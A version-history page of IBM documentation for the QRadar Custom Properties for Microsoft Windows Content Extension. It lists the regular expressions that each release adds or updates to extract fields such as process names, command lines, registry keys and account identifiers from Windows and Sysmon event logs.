Microsoft Windows

Use the IBM Security QRadar Custom Properties for Microsoft Windows Content Extension to expand QRadar searches and reports by normalizing specific event data from a log source. You can also make important data more visible in rules, searches, and reports.

For a list of events ID's and names that the IBM Security QRadar Custom Properties for Microsoft Windows Content Extension are based on, see here.

Note: This content extension does not install when the Parent Filename custom property is present from Cisco AMP V.1.0.0. Delete Parent Filename before you install this content extension.
Important: To avoid content errors in this content extension, keep the associated DSMs up to date. DSMs are updated as a part of the automatic updates. If automatic updates are not enabled, download the most recent version of the associated DSMs from IBM® Fix Central (https://www.ibm.com/support/fixcentral).

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.7

The Key Length custom property is new to IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.7. This custom property sets the default custom extraction of Key Length from DSM payload.

Table 1. New and updated Custom Event Properties Expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.7
Name New or Updated Capture Group Regex Description
Engine Version New 1 .*\bEngineVersion=([\.0-9]*)\b.* New custom event property.
Host Version New 1 .*\bHostVersion=([\.0-9]*)\b.* New custom event property.
SID History New 1 .*\s+SID History:\s+(S-\S+)\b.* New custom event property.
Delegation New 1 AllowedToDelegateTo:\s*(.*\S)\s+Old UAC Value: New custom event property.
LDAP Display Name New 1 LDAP Display Name:\s*(.*\S)\s+Syntax \(OID\): New custom event property.
Object Class New 1 Object.*Class:\s*(\S*) New custom event property.
Registry Key Updated 1 TargetObject:\s+(.*?)\\[^\\]+(?:\s+[^:]+|$) Updated regular expression.
Registry Value Name Updated 1 TargetObject:\s+.*?\\([^\\]+?)(?:\s+[^:]+|$) Updated regular expression.
Registry Value Data Updated 1 Details:\s+(.*?)(?:\s+User:\s+|$ Updated regular expression.
Pipe Name Updated    

Changed category to any / any.

Changed property name from PipeName to Pipe Name.

Key Length Updated     Changed type from alphanumeric to numeric.
Event ID Updated     Changed property name from EventID to Event ID.
Object Type Updated     Changed property name from ObjectType to Object Type.
Group ID Updated     Changed property name from GroupID to Group ID.
Oject Name Updated     Changed property name from ObjectName to Object Name.
Target Username Updated     Changed property name from Target User Name to Target Username.
Command Updated     Changed property name from Process CommandLine to Command.
Task Name Updated     Changed property name from TaskName to Task Name.
Share Path Updated     Changed property name from SharePath to Share Path.
Initiator Username Updated     Changed property name from Initiator User Name to Initiator Username.
Machine Identifier Updated    

Changed property name from Machine ID to Machine Identifier.

Changed property name from Computer Name to Machine Identifier.

Changed property name from User Workstations to Machine Identifier.

Process ID Updated     Changed property name from Process Id to Process ID.
Process GUID Updated     Changed property name from Process Guid to Process GUID.
Parent Process GUID Updated     Changed property name from Parent Process Guid to Parent Process GUID.
URL Host Updated     Changed property name from UrlHost to URL Host.
Process Path Updated     Changed property name from Image to Process Path.
Start Address Updated     Changed property name from StartAddress to Start Address.
Destination Hostname Updated     Changed property name from Destination Host Name to Destination Hostname.
Service Filename Updated     Changed property name from ServiceFileName to Service Filename.
Parent Command Updated     Changed property name from ParentCommandLine to Parent Command.

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.6

The Key Length custom property is new to IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.6. This custom property sets the default custom extraction of Key Length from DSM payload.

Table 2. New Custom Event Properties Expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.6
Name Custom Property ID Capture Group Regex
Key Length c732c6c4-3e1d-4116-88c5-b2df0782f711 1 Subject.*?Domain[\:\\\=\s]+(.*?)\s+(?:Logon ID)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.5

The following table shows the updated regex expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.5.

Table 3. Updated Regex Expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.5
Name Regex Expression ID Optimized Capture Group Regex
File aec96349-bf39-40a6-b549-373a835f7fbd Yes 1 file:.*?\.?[^\\.]+\.(?![0-9]{1,2}\.)([^\\]*?)\sowned\sby
Image Loaded 29f5ac46-341e-49b6-8fc3-513b0cc26c23 Yes 1 ImageLoaded:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+FileVersion
Object Name 27b28d8b-2876-4e1d-8126-4b643dfe6881 Yes 1 Object Name:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
4a691bc1-d1a4-4356-8027-2fa93a55c0e5 Yes 1 Object Name:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
ac769579-8e07-4755-aab0-0bc6489c7325 Yes 1 Object Name:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
d9f7021c-7b5f-46ff-8bdf-c7d277052955 Yes 1 Object Name:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
db21bfe3-3ee3-49d2-9160-c28e204649a7 Yes 1 Object Name:\s+.*?\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
Relative Target Name 32ac2a10-1a1b-4f40-8296-9275ce9627e0 Yes 1 Relative Target Name:\s+[^.\s]+\.(?!.*\.[0-9]{1,2}\.)([^\\]*?)\s+Access Request Information
793f755e-dc59-466c-bf41-67d9715b9be2 Yes 1 Relative Target Name:\s+[^.\s]+\.(?!.*\.[0-9]{1,2}\.)([^\\]*?)\s+Access Request Information
Target Filename 028e41cb-74f7-41d3-b5bd-378c5a1fb01d Yes 1 TargetFilename:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+CreationUtcTime
9662fc2c-61e5-48cf-9d00-412d7534a0c8 Yes 1 TargetFilename:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+CreationUtcTime
e4349d47-a2dd-46c7-a028-1f1457560a3b Yes 1 TargetFilename:\s+.*?\.([^\\]*?)\s+Hashes

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4

The following table shows the custom event properties that are new in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4.

Table 4. New Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4
Name Optimized Capture Group Regex
Consumer Destination Yes 1 Destination:\s+"(.*?)"$
Relative Target Name No 1 Relative Target Name[:\s\\=]*\s+([^&]*?)\s+Access

The following table shows the custom event properties that have new expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4.

Table 5. Custom Event Properties with new expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4
Name Optimized Capture Group Regex
Process Name Yes 1 SourceImage\:\s(?:.*\\)?([\w\.\-\d]+)\sTargetProcessG
Process Path Yes 1 SourceImage\:\s+(.*?)\s+TargetProcessGUID

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3

The following table shows the custom event properties that are new in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3.

Table 6. New Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3
Name Optimized Capture Group Regex
Attribute New Value No 1 Value: ([^\s]*?)(?:\s|$)
Authentication Package Yes 1 Authentication Package:\s+(.*?)\s+Transited
Initiated Yes 1 Initiated:\s+(.*?)\s+SourceIsIpv6
Logon Process Yes 1 Logon Process:\s+(.*?)\s+Authentication
Target Server Name No 1 Target Server Name:\s(.*?)\sAdditional

The following table shows the custom event properties that are updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3.

Table 7. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3
Name Optimized Capture Group Regex
PipeName Yes 1 PipeName\:\s(.*)\sImage

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.2

The Process CommandLine custom property received an update to remove a duplicate regex expression.

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.1

The following table shows the custom event properties that have new expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.1.

Table 8. New Custom Event Properties Expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.1
Name Optimized Capture Group Regex
User Domain Yes 1 Subject.*?Domain[\:\\\=\s]+(.*?)\s+(?:Logon ID)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.0

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.0.

Table 9. New and updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.0
Name Optimized Capture Group Regex
File Extension Yes 1 ImageLoaded:\s+.*?\.?[^\\.]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+FileVersion
Filename Yes 1 ImageLoaded:\s+.*?([^\\]*?)\s+FileVersion
Integrity Level Yes 1 IntegrityLevel:\s(\w+)
ParentCommandLine Yes 1 ParentCommandLine:\s(.*)
Process Id Yes 1 ProcessId:\s+(\d+)
Process Name Yes 1

New Process Name[:\s\\=]+.*?\\([^\\]*?)\s+(?:Token Elevation Type:|&&)

Image:.*?\\([^\\]*?)\sTargetFilename

Image:.*?\\([^\\]*?)\s(?:FileVersion|CommandLine):

Signed Yes 1 Signed:\s(true|false)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.8

The following table shows the custom event properties that are new in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.8.

Table 10. New Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.8
Name Optimized Capture Group Regex
Encoded Argument Yes 1

(?i)Process Command Line[:\s]*[a-z\.\s]+[\.\s\-][ncodema^]*[\s^]+(\S+)\s*Token Elevation Type

(?i)CommandLine:\spowershell[:\s]*[a-z\.\s]+[\.\s\-][ncodema^]*[\s^]+(\S+)\s*CurrentDirectory

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.7

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.7.

Table 11. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.7
Name Optimized Capture Group Regex
Service Name Yes 1 (?i)Service Name[\:\s\=\\]*(.*?)\s+(?:Service File Name:|&&)
ServiceFileName Yes 1 (?i)Service\sFile\sName\:\s*(.*)\sService\sType

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.6

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.6.

Table 12. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.6
Name Optimized Capture Group Regex
Process Name Yes 1

Image:.*\\(.*?)\sTargetFilename

Terminated Process Name Yes 1

Process Command Line[:\s\\=]+taskkill\s+\/im\s(.*?)\s\/f

Process Command Line[:\s\\=]+(?:net|net1)\s+stop\s(.*?)\s\/y

Target File Directory No 1 cs-bytes[=\s\t](\d+)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.5

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.5.

Table 13. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.5
Name Optimized Capture Group Regex
Destination Host Name Yes 1 DestinationHostname:\s+(.+?)\s+
EventID Yes 1

\d{2}\s\d{2}[:\s]\d{2}[:\s]\d{2}\s+\d{4}\s+(\d+)

^<\d+>[a-zA-Z]{3}[\s]\d{2}[\s]\d{2}:\d{2}:\d{2}[\s][a-zA-Z0-9\.]+[\s]LEEF:[0-9\.a-zA-Z\|]+\|(\d+)

Filename Yes 1 TargetFilename:\s?.*\\(.*?)\s+CreationUtcTime
Process Guid No 1 ProcessGuid: \{(.*?)\}
Process Id No 1 ProcessId:\s+(\d+)
Process Name Yes 1

Image:\s+.*\\(.*)

Image:.*\\(.*?)\sTargetFilename

Target File Directory Yes 1 TargetFilename:\s+(.*?)\s+CreationUtcTime:

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.4

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.4.

Table 14. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.4
Name Optimized Capture Group Regex
PipeName Yes 1 PipeName\:\s\\(.*)\sImage

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.3

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.3.

Table 15. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.3
Name Optimized Capture Group Regex
MD5 Hash Yes 1

MD5=([^\,]+)

MD5=(\w+)

Process CommandLine Yes 1 Process Command Line[:\s\\=]+(.*?)\s*(?:Token Elevation Type)
Process Name Yes 1 Process Name[:\s\\=]+(?:.*\\)?(.*?)\s+(?:Network Information|\s|&&)
SHA1 Hash Yes 1 SHA1=(\w+)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.2

All file extension regex values were updated to account for hidden executable extension and to exclude file versioning.

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.2.

Table 16. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.2
Name Optimized Capture Group Regex
File Directory Yes 1

ImageLoaded:\s+(.*)\\.*?\s+FileVersion

TargetFilename:\s+(.*)\\.*?\s+

File Extension Yes 1

OriginalFileName:\s+.*?\.(?![0-9]{1,2}\.)(.*?)\s+Hashes

TargetFilename:\s+.*?\.?[^\\.]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Hashes

Filename Yes 1 TargetFilename:\s?.*\\(.*?)\s+Hashes
IMP Hash Yes 1 IMPHASH=(\S+)
MD5 Hash No 1 MD5=([^\,]+)
ObjectType Yes 1 Object Type[:\s\\=]*([^\s&amp;]*)
Process Name Yes 1

Image:.*\\(.*?)\sTargetFilename

Image:\s+.*\\(.*?)\s

SHA1 Hash No 1 SHA1=(\w+)
SHA256 Hash Yes 1 SHA256=([^\,]+)
Start Address Yes 1 StartAddress:\s(.*?)\s

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.1

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.1.

Table 17. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.1
Name Optimized Capture Group Regex
Record Number Yes 1 RecordNumber=(\d*)

(Back to top)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.0

The following table shows the custom event properties that are updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.0.

Table 18. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.0
Name Optimized Capture Group Regex
File Directory Yes 1

Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+(.*?)\\[^\\]*?\s+(?:Handle ID|&&)

TargetFilename:\s+(.*)\\.*?\s+

File Extension Yes 1

Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+.*\\.*?\.((?:[^\.]*?\.){0,1}[^\.]*?)\s+(?:Handle ID|&&)

OriginalFileName:\s+(.*?)\s+Hashes

TargetFilename:.*\\.*?\.((?:[^\.]*?\.){0,1}[^\.]*?)\s+CreationUtcTime

Filename Yes 1

Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+.*?\\([^\\]*?)\s+(?:Handle ID|&&)

OriginalFileName:\s+(.*?)\s+Hashes

TargetFilename:\s?.*\\(.*?)\s+CreationUtcTime

Hostname Yes 1 Host Name = ([^\s]+)
Image Yes 1

Image:\s*(.+?)\s+FileVersion:

Image: (.*?)\s+ImageLoaded

Image:\s*(.+?)\s+TargetFilename:

IMP Hash Yes 1

IMPHASH=([^\,]+)

IMPHASH=(\w+)

Machine ID Yes 1 Computer=([^\s]+)
MD5 Hash Yes 1

MD5=([^\,]+)

MD5=(\w+)

Message Yes 1 subject(?:[^,]*?,){11}([^,]*?)\,
Parent Process Guid Yes 1 ParentProcessGuid: \{(.*?)\}
Parent Process ID Yes 1 ParentProcessId:\s+(\d+)
Parent Process Name Yes 1 ParentImage:\s?.*\\([^\s]+)\sParentCommandLine
Parent Process Path Yes 1 ParentImage:\s*(.+?)\s+ParentCommandLine:
Process CommandLine Yes 1

CommandLine:\s*(.+?)\s+CurrentDirectory

Scriptblock text.*?:\s+(.*?)\s+ScriptBlock ID

Process Id Yes 1 ProcessId:\s+(\d+)
Process Name Yes 1

CommandLine:\s+"[^\"]*\\([^\"]+)"\s+Current®

Image:\s+.*?\\([^\\]*?)\s+.*$

Image:.*\\(.*?)\sFileVersion

Image:.*\\(.*?)\s+ImageLoaded

Image:.*\\(.*?)\sTargetObject

Image:.*\\(.*?)\sUser

Process Name: \s?.*\\([^\s]+)

Process Path Yes 1

Image:\s+(.*)

Image:\s+(.*?)\s+FileVersion:

Registry Key Yes 1 TargetObject:\s+(.*)\\.*\s+Details:
Registry Value Data Yes 1 Details:\s+(.*)
Rule Name Yes 1 RuleName[:\s\\=]+([^\s&]+)\s+EventType
SHA256 Hash Yes 1

SHA256=(\w+)

SHA256=([^\,]+)

Target User Name Yes 1 Account Name:\s+.*?Account Name:\s+([^\s]*)
Token Elevation Type Yes 1 Token Elevation Type: (%%\d{4})
UrlHost Yes 1

(?:(?:http|ftp|tcp|ssl|https):\/\/)(.*?)(?=$|\s|\\|\"|\/|\:|\|)

QueryName:\s(.*)\sQueryStatus

(Back to top)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.5

The following table shows the custom event properties that are updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.5.

Table 19. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.5
Name Optimized Capture Group Regex
GroupID Yes 1 Group ID[:\s\\=]*(\d+)
Parent Process Name Yes

Yes

1

1

Process Name.*\\(.*?)\s+Target Process

Creator Process Name[:\s]+(?:.*\\)?(.*?)\s+Process Command Line

Parent Process Path Yes

Yes

1

1

Process Name[:\s\\=]+(.*?)\s+(?:Target Process|&&)

Creator Process Name[:\s]+(.*?)\s+Process Command Line:

(Back to top)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.4

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.4.

Table 20. New or Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.4
Name Optimized Capture Group Regex
Access Mask Yes 1

Access Mask[:\s\\=]*\s+(0[^\s&]+)

Note: The System.Information expression for this regex is disabled by default, as it can return many event matches and affect performance.
Accesses Yes

Yes

1

1

Accesses[:\s\\=]*(.*?)\s+(?:Access (?:Check Results|Mask|Reasons)|Properties|Privileges|&&|$)

Operation Type[:\s\\=]*(.*?)(?:\s+Process Information|&&)

Note: The System.Information expression for this regex is disabled by default, as it can return many event matches and affect performance.
Account Security ID No

No

1

1

User ID[:\s\\=]*(.*?)\s+(?:Service\s|&&)

Subject:\s+?Security ID:\s+(.*?)\s+(?:Subject:|Account Name)

Note: The Subject:\s+ ... regex is disabled by default, as it can return many event matches and affect performance.
Computer Name No

No

No

No

No

1

1

1

1

1

Workstation Name[:\s\\=]+([^\s&]+)\s+Source

Source Workstation[:\s\\=]+([^\s&]+)\s+Error

Caller Computer Name[:\s\\=]+([^\s&]+)(?:\s\s|$)

from the computer ([^\s]+)

Error Code Yes

Yes

Yes

Yes

Yes

Yes

1

1

1

1

1

1

Error Code[:\\\s=]*([^\s&]+)

error status[:\\\s=]+([^\s&\.]+)

Result Code[:\\\s=]*([^\s&]+)

Error value[:\\\s=]+([^\s:&]+)

Failure Code[:\\\s=]*([^\s&]+)

Status[:\\\s=]*([^\s&]+)

EventID Yes

Yes

Yes

1

1

1

(?:EventID|EventIDCode|externalId)[:\s\\=]+(\d+)

\d{1,2}\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)

LEEF:[0-9\.]+\|Microsoft\|Windows\|.+\|(\d+)\|

Extended Error Code Yes 1 Sub[\s,_]*Status[:\\\s=]+([^\s&]+)
Filename Yes

Yes

Yes

1

1

1

Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+.*?\\([^\\]*?)\s+(?:Handle ID|&&)

Relative Target Name:\s.*\\(.*?)\s+Access Request Information:

file:.*\\(.*?)\sowned\sby

File Directory Yes 1

file:(.*?)\\[^\\]*?\s+owned\sby

Relative Target Name:\s+(.*)\\.*?\s+Access Request Information:

Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+(.*?)\\[^\\]*?\s+(?:Handle ID|&&)

File Extension Yes

Yes

Yes

1

1

1

Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+.*?\\.*?\.([^\\\.]*?)\s+(?:Handle ID|&&)

Relative Target Name[:\s]*.*\\[^\.]*?\.(.*?)\s+Access Request Information:

file:.*\\.*?\.(.*?)\sowned\sby

File Path No 1

file:(.*?)\sowned\sby

Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\\=]+(.*?)\s+(?:Handle ID| &&)

Relative Target Name:\s+(.*?)\s+Access Request Information:

Group Domain No

No

No

1

1

1

(?:Group Domain|Target Domain)[:=\s\\]+([^\s]+)

Group[\s\:]+.*?Account Domain[\s\:\\=]+([^\s]+)

(?:Group Domain|New Domain)[:=\s\\]+([^\s]+)

Group Name Yes

Yes

Yes

1

1

1

(?:Group Name|New Account Name)[:=\s\\]+(.*?)\s+(?:Group Domain|New Domain|Group:|&&)

(?:Group Name|Target Account Name)[:=\s\\]+(.*?)\s+(?:Group Domain|Target Domain|Group:|&&)

Group[\s\:]+.*?Account Name[\s\:\\=]+(.*?)\s+(?:Account Domain|&&)

Group Security ID No

No

No

No

1

1

1

1

Group[:\s]*Security ID[:=\s\\]+(.*?)\s+(?:Group Name|Group:|Account Name|&&)

Group[:\s]*Security ID[:=\s\\]+(.*?)\s+(?:Group Name|Group:|&&)

Target Account ID[:=\s\\]+(.*?)\s+(?:Caller User Name|&&)

New Account ID[:\s\\=]+(.*?)(?:\s+Caller User Name|&&)

GroupID No 1 Group ID[:\s\\=]*(\d+)
Home Directory No 1 Home Directory[:\s]*(.*?)\s+Home Drive:
Initiator User Name Yes 1 Subject.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain|&&)
Logon Type Yes 1 Logon Type[:\s\\=]+(\d+)
Message No 1 Message=(.+)
ObjectName Yes

Yes

1

1

Object Name[:\s\\=]+(.*?)\s+(?:Object Value Name|&&)

Object Name[:\s\\=]+(.*?)\s+(?:Handle ID|&&)

Note: The Success Audit event in the System.Information expression for this regex is disabled by default, as it can return many event matches and affect performance.
ObjectType No 1 Object Type[:\s\\=]*([^\s&]*)
Parent Process Name No

No

1

1

Process Name.*\\(.*?)\s+Target Process

Creator Process Name[:\s]+(?:.*\\)?(.*?)\s+Process Command Line

Parent Process Path No

No

1

1

Process Name[:\s\\=]+(.*?)\s+(?:Target Process|&&)

Creator Process Name[:\s]+(.*?)\s+Process Command Line:

Process CommandLine Yes 1 Process Command Line[:\s\\=]+(.*?)\s*(?:Token Elevation Type|\t|\s\s|&&)
Process Name Yes

Yes

Yes

1

1

1

Process Name[:\s\\=]+(?:.*\\)+(.*?)\s+(?:Network Information|\s|&&)

New Process Name[:\s\\=]+.*?\\([^\\]*?)\s+(?:Token Elevation Type:|&&)

Target Process Name.*\\(.*?)\s+(?:New Token Information|&&)

Note: The System.Information expression for this regex is disabled by default, as it can return many event matches and affect performance.
Process Path No

No

No

1

1

1

New Process Name[:\s\\=]*(.*?)\s+(?:Token Elevation Type:|&&)

Caller Process Name[:\s\\=]+(.*?)\s+(?:Network Information|&&)

Record Number No 1 RecordNumber=(\d*)
Registry Key Yes

Yes

Yes

Yes

1

1

1

1

Object Name[:\s\\=]+\\REGISTRY\\USER\\.*?\\.*?(\\.*?)\s+(?:Object Value Name|&&)

Object Type[:\s\\=]+Key.*?Object Name[:\s\\=]+\\REGISTRY\\USER\\.*?\\.*?(\\.*?)\s+(?:Handle ID|&&)

Object Type[:\s\\=]+Key.*?Object Name[:\s\\=]+\\REGISTRY\\MACHINE(\\.*?)\s+(?:Handle ID|&&)

Object Name[:\s\\=]+\\REGISTRY\\MACHINE(\\.*?)\s+(?:Object Value Name|&&)

Registry Value Data Yes 1 New Value[:\\=]\s+(.+)
Registry Value Name Yes 1 Object Value Name[:\s\\=]+(.*?)\s+(?:Handle ID|&&)
SAM Account Name No 1 S(?:AM|am) Account Name[:\s]*(.*?)\s+Display Name:
Scope No 1 Scope:\s(.*?)\s+(\d+|$)
Service Name Yes

Yes

Yes

1

1

1

Service Name[:\s\\=]*(.*?)\s+(?:Service ID:|&&)

\\SYSTEM\\ControlSet\d*\\Services\\(.*?)\s+Object Value Name

Service Name[\:\s\=\\]*(.*?)\s+(?:Service File Name:|&&)

Share Name Yes 1 Share Name[:\s].*?\\([^\\]*?)\s+Share Path:
Share Path No

No

1

1

Share Path[\:\s]*(.*)

Share Path[\:\s]*(.*?)\s+Access Request Information:

Target Account Security ID No

No

No

No

No

No

No

No

No

No

No

1

2

1

1

1

1

1

1

1

1

1

New Logon.*?Security ID[:\s\\=]+(.*?)\s+(?:Account Name|&&)

(Assigned\sTo|Removed\sFrom):\s+(.*?)\s+?(Assigned|Removed)\sBy:

New Token Information[:\=\s\\]+Security ID[:\=\s\\]+(.*?)\s+(?:Account Name|&&|\s)

Target Subject[:\s]*Security ID[:\s\\=]+(.*?)\s+(?:Account Name|&&)

Member[\:\s]+(?:Security )?ID[\:\s\\=]+(.*?)\s+(?:(?:Target\s)?Account Name|&&)

Target Account ID[:\s\\=]+(.*?)\s+(?:Caller Machine Name|&&)

Target Account.*?ID[:\s\\=]+(.*?)\s+(?:Account Name|Account Domain|Caller User Name|&&)

Target Account.*?ID[:\s\\=]+(.*?)\s+(?:Account Name|Caller User Name|&&)

New Account.*?ID[:\s\\=]+(.*?)\s+(?:Account Name|Caller User Name|&&)

Account That Was Locked Out[:\s]*Security ID[:\s\\=]+(.*?)\s+(?:Account Name|&&)

Account For Which Logon Failed.*?Security ID[\:\\\=\s]+(.*?)\s+(?:Account Name|&&)

Target Computer Domain No

No

No

1

1

1

New Computer Account:.*Account Domain:\s(.*?)\s+Attributes:

Computer Account That Was Changed:.*Account Domain:\s(.*?)\s+Changed Attributes:

Target Computer:.*Account Domain:\s(.*?)\s+Additional Information:

Target Computer Name No

No

No

1

1

1

Target Computer:.*Account Name[:\s]*(.*?)\s+Account Domain:

Computer Account That Was Changed:.*Account Name[:\s]*(.*?)\s+Account Domain:

New Computer Account:.*Account Name[:\s]*(.*?)\s+Account Domain:

Target User Domain No

No

No

No

No

No

No

No

No

No

No

No

No

No

No

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

New Account.*?Account Domain[\:\\\=\s]+([^\s]+)

Target Account.*?Domain[\:\\\=\s]+([^\s]+)

Target Account.*?Account Domain[\:\\\=\s]+([^\s]+)

New Domain[\:\\\=\s]+([^\s]+)

Target.*?Domain[\:\\\=\s]+([^\s]+)

Target.*?Domain[:\s\\=]+([^\s]+)

Target Account ID[\:\\\=\s]+([^\s\\]+)(?:\\.*?)\s+Caller

Target Domain[\:\\\=\s]+([^\s]+)

Member[\:\s]+(?:Security )?ID[\:\s]+([^\s\\]*?)\\.*?\s+(?:Target\s)?Account Name

New Logon:.*?Account Domain[\:\\\=\s]+([^\s]+)

Account That Was Locked Out[\s\:]*Security ID[\:\\\=\s]+([^\s\\]+)(?:\\.*?)\s+Account Name

Account For Which Logon Failed.*?Account Domain[\:\\\=\s]+([^\s]+)

New Token Information:.*?Account Domain[\:\\\=\s]+([^\s]+)

Target Subject.*?Account Domain[\:\\\=\s]+([^\s]+)

dntdom=([^\s]+)

Target User Name Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

Target Account.*?Name[\:\\\=\s]+(.*?)\s+(?:New Right:|Removed Right:|&&|\s)

Member[\:\s]+(?:Security )?ID[\:\s]+(?:[^\s\\]*?)\\(.*?)\s+(?:Target\s)?Account Name

Whose Credentials Were Used:.*?Name:[\:\\\=\s]+(.*?)\s+(?:Account Domain|Target Domain:|&&)

Account That Was Locked Out.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Additional Information|&&)

Target Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain:|Target Domain:|&&)

Target Account.*?Name[\:\\\=\s]+(.*?)\s+(?:Account Domain:|Target Domain:|&&)

Account For Which Logon Failed.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain|&&)

Target Account.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain|&&|\s)

Target Account Name[\:\\\=\s]+(.*?)\s+(?:Target Account ID:|&&)

duser=([^&]*?)\s+duid

New Account Name[:\s]*(.*?)\s*(?:Additional Information:|&&)

Target Subject.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain|&&)

New Account.*?Name[\:\\\=\s]+(.*?)\s+(?:Account Domain:|New Domain:|&&)

New Token Information:.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain:|&&)

Target User Name[:\s\\=]*(.*?)\s*(?:Target Domain:|&&)

New Logon.*?Name:[\:\\\=\s]+(.*?)\s+(?:Account Domain|Target Domain:|&&)

TaskName No

No

1

1

Task Name[\:\s\\=]*\\(.*?)\s+(?:Task Content:|&&)

